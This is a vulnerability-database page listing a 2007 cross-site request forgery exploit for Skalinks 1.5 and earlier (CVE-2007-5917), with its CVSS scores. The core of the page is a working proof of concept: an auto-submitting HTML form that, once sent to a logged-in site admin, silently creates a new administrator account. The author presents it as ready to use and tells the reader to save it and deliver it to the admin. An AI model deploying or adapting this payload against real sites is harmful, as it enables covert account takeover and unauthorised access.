Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
Skalinks <= 1_5 Cross Site Request Forgery Add Admin
2007.11.10
Credit:
djvincy
Risk:
Low
Local:
No
Remote:
Yes
CVE:
CVE-2007-5917
CWE:
CWE-352
Ogólna skala CVSS:
6.8/10
Znaczenie:
6.4/10
Łatwość wykorzystania:
8.6/10
Wymagany dostęp:
Zdalny
Złożoność ataku:
Średnia
Autoryzacja:
Nie wymagana
Wpływ na poufność:
Częściowy
Wpływ na integralność:
Częściowy
Wpływ na dostępność:
Częściowy
######################################################################## ## # _ _ _ _ _____ _ _ # # | | | | | | (_) |_ _| (_) | | # # | |_| | __ _ ___| | ___ _ __ __ _ | | _ __ ___ _ __| | ___ # # | _ |/ _` |/ __| |/ / | '_ \ / _` | | || '_ \/ __| |/ _` |/ _ \ # # | | | | (_| | (__| <| | | | | (_| | _| || | | \__ \ | (_| | __/ # # \_| |_/\__,_|\___|_|\_\_|_| |_|\__, | \___/_| |_|___/_|\__,_|\___| # # __/ | # # |___/ # #_______________________________________________________________________ _# | | | Site: www.hackinginside.altervista.org | | Project: Skalinks <= 1_5 Cross Site Request Forgery Add Admin | | Author: Vincy | | Email: djvincy (at) hotmail (dot) it [email concealed] | |_______________________________________________________________________ _| This code, must be saved in a HTML page and sended to the site admin. So the admin will add a new admin in the mySQL with that info. It work only if admin's logged. ------------------------------------------------------------------------ ------------------- <form action="http://site.com/path/admin/admin_account.php" name="add_admin" method="post"> <input type="text" name="admin_name" value="[ NOME ]"> <input type="text" name="admin_password" value="[ PASSWORD ]"> <input type="text" name="admin_email" value="[ EMAIL ]"> <select name="admin_type"><option value="2">Super Editor</option></select> <input type=hidden name="Add_admin" value="Add Admin"> </form> <script>document.add_admin.submit()</script> ------------------------------------------------------------------------ ------------------- # Vincy - Hacking Inside Crew
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top
Polish
English